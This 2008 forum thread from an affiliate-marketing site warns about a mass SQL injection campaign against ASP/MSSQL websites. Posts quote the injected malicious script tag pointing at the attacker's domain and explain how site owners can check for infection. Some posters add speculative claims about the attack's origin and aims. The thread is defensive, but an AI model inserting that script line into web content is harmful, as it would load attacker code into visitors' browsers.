Affiliate Marketing
Forum Search

Reply
 
LinkBack Thread Tools Display Modes

  #1 (permalink)  
Old 22-04-08
Registered User
 
Join Date: Apr 2008
Posts: 8
Thanks: 0
Thanked 0 Times in 0 Posts
Granada is an unknown quantity at this point
  Virus Threat

We've just had our forums wiped out by this virus, www. nihaorr1.com/1.js.

After checking in Google, it wipes out .asp databases, and returns several times.

Spread the word quickly
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Sponsored Links
  #2 (permalink)  
Old 26-04-08
Technophobe Geek
 
Join Date: Jan 2005
Location: Cumbria, UK
Posts: 482
Thanks: 0
Thanked 1 Time in 1 Post
trevHCS is an unknown quantity at this point
  Re: Virus Threat

Looks like a nice one attacking ASP / MSSQL stuff. Added more into the web hosting section.

nihaorr1.com ASP virus

Trev
__________________
UK Hotel :: UK Cottage :: UK Attraction :: Mad Theories
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #3 (permalink)  
Old 26-04-08
John Jupp's Avatar
The New 'Arfur Daley
 
Join Date: Mar 2004
Location: Kent UK
Posts: 2,352
Thanks: 34
Thanked 40 Times in 30 Posts
John Jupp is an unknown quantity at this point
  Re: Virus Threat

I can't find the link now. It's a SQL injection attack using vulnerabilities in Windows IIS for which there is NO fix. Most of the current attacks are eminating from Russia.
__________________
Read Our Blog, London/New York/San Francisco Affiliate Program Management - Contact Us
My Contact Details: Terrasip: 21100004227 @ terrasip.net Skype: john_jupp
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #4 (permalink)  
Old 26-04-08
John Jupp's Avatar
The New 'Arfur Daley
 
Join Date: Mar 2004
Location: Kent UK
Posts: 2,352
Thanks: 34
Thanked 40 Times in 30 Posts
John Jupp is an unknown quantity at this point
  Re: Virus Threat

Irony is if you do a google search for nihaorr1 then all the infected websites are listed (122,000+ entries) as their SQL injection is picked up and displayed by Google in the header. Many seem to be travel websites, obviously to get payment details on reservations.
__________________
Read Our Blog, London/New York/San Francisco Affiliate Program Management - Contact Us
My Contact Details: Terrasip: 21100004227 @ terrasip.net Skype: john_jupp
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Sponsored Links
  #5 (permalink)  
Old 26-04-08
John Jupp's Avatar
The New 'Arfur Daley
 
Join Date: Mar 2004
Location: Kent UK
Posts: 2,352
Thanks: 34
Thanked 40 Times in 30 Posts
John Jupp is an unknown quantity at this point
  Re: Virus Threat

nihaorr1 - Google Search

Notice the <script src=http://www.nihaorr1.com/1.js></script> in the header of each website. Hacked.
__________________
Read Our Blog, London/New York/San Francisco Affiliate Program Management - Contact Us
My Contact Details: Terrasip: 21100004227 @ terrasip.net Skype: john_jupp
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #6 (permalink)  
Old 26-04-08
John Jupp's Avatar
The New 'Arfur Daley
 
Join Date: Mar 2004
Location: Kent UK
Posts: 2,352
Thanks: 34
Thanked 40 Times in 30 Posts
John Jupp is an unknown quantity at this point
  Re: Virus Threat

To check if YOUR site has been listed (with the infection) and subject obviously to Google having visited type in google search:

nihaorr1 your site name as displayed in the header

An example being: nihaorr1 funway holidays - Google Search

Then if you see the <script src=http://www.nihaorr1.com/1.js></script> command in the header you are a victim.
__________________
Read Our Blog, London/New York/San Francisco Affiliate Program Management - Contact Us
My Contact Details: Terrasip: 21100004227 @ terrasip.net Skype: john_jupp
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #7 (permalink)  
Old 26-04-08
tbp tbp is offline
Registered User
 
Join Date: Dec 2006
Posts: 1,999
Thanks: 0
Thanked 18 Times in 18 Posts
tbp is an unknown quantity at this point
  Re: Virus Threat

Very interesting post about this below, which explains how it works and what it does:

Anyone know about www.nihaorr1.com/1.js? - IIS.net
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Sponsored Links
Reply

Bookmarks


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
ZoneAlarm launches with zanox! Zanox Zanox 0 28-08-07 09:50 AM
Kama Sutra Virus Alert LeylaPCSS Merchant Promotions & Incentives 0 01-02-06 08:47 PM


Affiliate Marketing RSS Feeds - Contact Us - Affiliate Marketing - Archive - Privacy Statement - Top

Content Relevant URLs by vBSEO 3.2.0 RC7